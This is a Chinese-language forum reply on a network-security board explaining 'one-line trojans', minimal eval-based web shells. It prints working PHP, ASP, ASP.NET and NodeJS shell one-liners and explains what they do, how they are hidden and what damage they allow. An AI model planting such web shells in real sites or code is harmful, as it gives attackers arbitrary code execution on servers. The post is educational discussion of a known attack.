作者CMJ0121 (不要偷 Q)
看板NetSecurity
标题Re: [问题] 一句话木马
时间Sat May 25 11:22:13 2019
※ 引述《newnovice (serenity)》之铭言:
: 在网路上看到这个东东
: <%@ Page Language="Jscript" validateRequest="false"
: %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
: 挺有趣的,有大神可以解释这一行作用吗,感谢。
我曾经比较熟 PHP 版本的一句话木马 毕竟 PHP[0] 是最厉害的程式语言 (疑)
PHP 版本的一句话木马木马可以是
<?php eval($_POST['x']);
?>
PHP 本身就是一种样板 (Template) 语言 他可以在後端执行程式、结果渲染在前端
如果 熟悉 PHP 或者看过上一篇的推文可以知道 这段程式码可以拆解成
<?php // PHP start symbol
eval( // builtin function and execute any PHP source code
$_POST['x'] // data from POST method which key is 'x'
);
?> // PHP end symbol
可以发现重点在於透过一句话木马的 eval 来执行任意 PHP 程式码
这代表类似功能的网页语言都可以有一句话木马 像是
ASP 版本的 <%eval request (x); %>
NodeJS 的 eval(req.query.pass)
都是透过 eval 等程式语言内建可以执行程式码本身的功能
而怎麽利用一句话木马 就要问你程式功力如何了 (烟)
你可以用程式做到什麽事情 一句话木马就可以做到 80~99% 的事情
进阶的问题则是如何隐藏一句话木马 毕竟这年头一句话木马已经被广泛(?)使用
大多数安全软体都宣称可防范一句话木马
在我之前的文章[1] 有提到混淆 Webshell 的例子
就是透过一大堆 _ 来组成 webshell 需要的内容
至於一句话木马可以造成的危害 就是系统设定跟提权的问题
假若你的 Web Service 是用 root 执行 那透过一句话木马跟拿到 reversed shell 没有太大的差别
如果有降权或者跑在 docker 里面 那一句话木马能造成的危害
大概就是让你的电脑 替区块链世界尽一分心力
[0]:
https://zh.wikipedia.org/wiki/PHP
[1]:
https://webptt.com/cn.aspx?n=bbs/NetSecurity/M.1517412273.A.E5F.html
--
※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 106.1.224.240
※ 文章网址: https://webptt.com/cn.aspx?n=bbs/NetSecurity/M.1558754535.A.B34.html
※ 编辑: CMJ0121 (106.1.224.240), 05/25/2019 11:23:25
1F:推 st1009: 推推详细,可以再补充几个混淆的形式 05/25 20:09
2F:→ st1009: 唉,下面有 05/25 20:10
3F:推 st1009: 嗯,上一篇没有一句话范例 05/25 20:12
4F:推 newnovice: 非常感谢版主详细说明 渲染一词说得真好 05/25 23:19
5F:→ newnovice: 区块链世界尽一分心力XD 看来要好好KK程式了(茶) 05/25 23:20